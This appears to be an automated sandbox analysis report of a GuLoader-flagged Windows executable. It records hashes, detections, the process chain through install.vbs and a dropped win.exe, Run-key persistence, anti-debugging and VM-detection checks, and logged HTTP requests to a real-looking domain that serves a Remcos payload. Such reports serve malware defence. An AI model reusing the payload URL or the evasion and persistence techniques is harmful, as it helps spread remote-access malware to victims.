Play interactive tour

Edit tour

Analysis Report 4AtUJN8Hdu.exe

Overview

General Information

Sample Name:	4AtUJN8Hdu.exe
Analysis ID:	356514
MD5:	d7e81abce9332847471b89e50b241172
SHA1:	a6455d3a4fb9c2e5627dcbf46702a4e16c2492da
SHA256:	6141efb6f1598e2205806c5a788e61c489440dfc942984ee1688bb68ad0f18df
Tags:	exeGuLoader
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Contains functionality to hide a thread from the debugger

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

4AtUJN8Hdu.exe (PID: 6356 cmdline: 'C:\Users\user\Desktop\4AtUJN8Hdu.exe' MD5: D7E81ABCE9332847471B89E50B241172)

4AtUJN8Hdu.exe (PID: 6564 cmdline: 'C:\Users\user\Desktop\4AtUJN8Hdu.exe' MD5: D7E81ABCE9332847471B89E50B241172)

wscript.exe (PID: 984 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 5476 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

win.exe (PID: 6748 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: D7E81ABCE9332847471B89E50B241172)

win.exe (PID: 6904 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: D7E81ABCE9332847471B89E50B241172)

win.exe (PID: 7148 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: D7E81ABCE9332847471B89E50B241172)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: 4AtUJN8Hdu.exe PID: 6564	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: 4AtUJN8Hdu.exe PID: 6564	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: mtspsmjeli.sch.id	Virustotal: Detection: 12%			Perma Link
Source: http://mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin	Virustotal: Detection: 15%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\win.exe	Virustotal: Detection: 35%			Perma Link
Source: C:\Users\user\AppData\Roaming\win.exe	ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Show sources

Source: 4AtUJN8Hdu.exe

Virustotal: Detection: 35%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\win.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: 4AtUJN8Hdu.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: 4AtUJN8Hdu.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Source: Joe Sandbox View

IP Address: 103.150.60.242 103.150.60.242

Source: Joe Sandbox View

ASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID

Source: global traffic

HTTP traffic detected: GET /cl/VK_Remcos%20v2_AxaGIU151.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache

Source: global traffic

HTTP traffic detected: GET /cl/VK_Remcos%20v2_AxaGIU151.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: mtspsmjeli.sch.id

Source: 4AtUJN8Hdu.exe, 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp

String found in binary or memory: http://mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: win.exe, 0000001E.00000002.753745838.000000000067A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566C80 NtSetInformationThread,	26_2_00566C80
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566766 NtProtectVirtualMemory,	26_2_00566766
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_0056631A NtSetInformationThread,	26_2_0056631A
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00560534 EnumWindows,NtSetInformationThread,	26_2_00560534
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566E75 NtSetInformationThread,	26_2_00566E75
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_0056061B NtSetInformationThread,	26_2_0056061B
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005606D3 NtSetInformationThread,	26_2_005606D3
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00560EDD NtProtectVirtualMemory,	26_2_00560EDD
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566EDB NtSetInformationThread,	26_2_00566EDB
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005668F5 NtProtectVirtualMemory,	26_2_005668F5
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566CE5 NtSetInformationThread,	26_2_00566CE5
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_0056069F NtSetInformationThread,	26_2_0056069F
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566C99 NtSetInformationThread,	26_2_00566C99
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566EA3 NtSetInformationThread,	26_2_00566EA3
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00560743 NtSetInformationThread,	26_2_00560743
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566D6A NtSetInformationThread,	26_2_00566D6A
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00560F68 NtProtectVirtualMemory,	26_2_00560F68
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005605DE NtSetInformationThread,	26_2_005605DE
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566DD9 NtSetInformationThread,	26_2_00566DD9
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005659CD NtSetInformationThread,	26_2_005659CD
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00560DBD NtProtectVirtualMemory,	26_2_00560DBD
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00560FA1 NtProtectVirtualMemory,	26_2_00560FA1
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00566DAB NtSetInformationThread,	26_2_00566DAB

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 0_2_00402BF9		0_2_00402BF9
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00564B29		26_2_00564B29

Source: 4AtUJN8Hdu.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: win.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 4AtUJN8Hdu.exe, 00000000.00000000.227272150.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRidgepieceudtrreu.exe vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe, 00000000.00000002.686046598.00000000021F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe, 0000001A.00000002.712764051.000000001E020000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe, 0000001A.00000002.712764051.000000001E020000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe, 0000001A.00000002.712402397.000000001DC50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe, 0000001A.00000002.712447968.000000001DF20000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe, 0000001A.00000000.684091283.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRidgepieceudtrreu.exe vs 4AtUJN8Hdu.exe
Source: 4AtUJN8Hdu.exe	Binary or memory string: OriginalFilenameRidgepieceudtrreu.exe vs 4AtUJN8Hdu.exe

Source: 4AtUJN8Hdu.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/3@1/1

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

File created: C:\Users\user\AppData\Roaming\win.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_01
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Mutant created: \Sessions\1\BaseNamedObjects\Remcos-K77NUC

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

File created: C:\Users\user\AppData\Local\Temp\~DFCACFC5B555D77E93.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'

Source: 4AtUJN8Hdu.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 4AtUJN8Hdu.exe

Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

File read: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4AtUJN8Hdu.exe 'C:\Users\user\Desktop\4AtUJN8Hdu.exe'
Source: unknown	Process created: C:\Users\user\Desktop\4AtUJN8Hdu.exe 'C:\Users\user\Desktop\4AtUJN8Hdu.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: 4AtUJN8Hdu.exe PID: 6564, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: 4AtUJN8Hdu.exe PID: 6564, type: MEMORY

Source: 4AtUJN8Hdu.exe	Static PE information: real checksum: 0x27364 should be: 0x25d86
Source: win.exe.26.dr	Static PE information: real checksum: 0x27364 should be: 0x25d86

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 0_2_0040546F push edx; iretd	0_2_00405471
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 0_2_00404889 push ds; retf	0_2_0040488A
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 0_2_0040769A push esp; iretd	0_2_0040769B

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

File created: C:\Users\user\AppData\Roaming\win.exe

Jump to dropped file

Boot Survival:

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win			Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 4AtUJN8Hdu.exe, 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE`
Source: 4AtUJN8Hdu.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\SysWOW64\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Code function: 26_2_00560A8C rdtsc

26_2_00560A8C

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: 4AtUJN8Hdu.exe, 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe`
Source: 4AtUJN8Hdu.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Code function: 26_2_0056631A NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000

26_2_0056631A

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Code function: 26_2_00560A8C rdtsc

26_2_00560A8C

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Code function: 26_2_00563623 LdrInitializeThunk,

26_2_00563623

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_0056229F mov eax, dword ptr fs:[00000030h]	26_2_0056229F
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_0056631A mov eax, dword ptr fs:[00000030h]	26_2_0056631A
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00561AD5 mov eax, dword ptr fs:[00000030h]	26_2_00561AD5
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005662DB mov eax, dword ptr fs:[00000030h]	26_2_005662DB
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005654F7 mov eax, dword ptr fs:[00000030h]	26_2_005654F7
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_005622AB mov eax, dword ptr fs:[00000030h]	26_2_005622AB
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00564D4A mov eax, dword ptr fs:[00000030h]	26_2_00564D4A
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_0056632D mov eax, dword ptr fs:[00000030h]	26_2_0056632D
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00562FEA mov eax, dword ptr fs:[00000030h]	26_2_00562FEA
Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Code function: 26_2_00565582 mov eax, dword ptr fs:[00000030h]	26_2_00565582

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior

Source: win.exe, 0000001E.00000002.754244336.0000000000C40000.00000002.00000001.sdmp, win.exe, 0000001F.00000002.754158603.0000000000C30000.00000002.00000001.sdmp, win.exe, 00000020.00000002.753790785.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: win.exe, 0000001E.00000002.754244336.0000000000C40000.00000002.00000001.sdmp, win.exe, 0000001F.00000002.754158603.0000000000C30000.00000002.00000001.sdmp, win.exe, 00000020.00000002.753790785.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: win.exe, 0000001E.00000002.754244336.0000000000C40000.00000002.00000001.sdmp, win.exe, 0000001F.00000002.754158603.0000000000C30000.00000002.00000001.sdmp, win.exe, 00000020.00000002.753790785.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: win.exe, 0000001E.00000002.754244336.0000000000C40000.00000002.00000001.sdmp, win.exe, 0000001F.00000002.754158603.0000000000C30000.00000002.00000001.sdmp, win.exe, 00000020.00000002.753790785.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: win.exe, 0000001E.00000002.754244336.0000000000C40000.00000002.00000001.sdmp, win.exe, 0000001F.00000002.754158603.0000000000C30000.00000002.00000001.sdmp, win.exe, 00000020.00000002.753790785.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\4AtUJN8Hdu.exe

Code function: 26_2_00560ABC cpuid

26_2_00560ABC

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder1	Process Injection12	Masquerading1	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion22	LSASS Memory	Security Software Discovery531	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
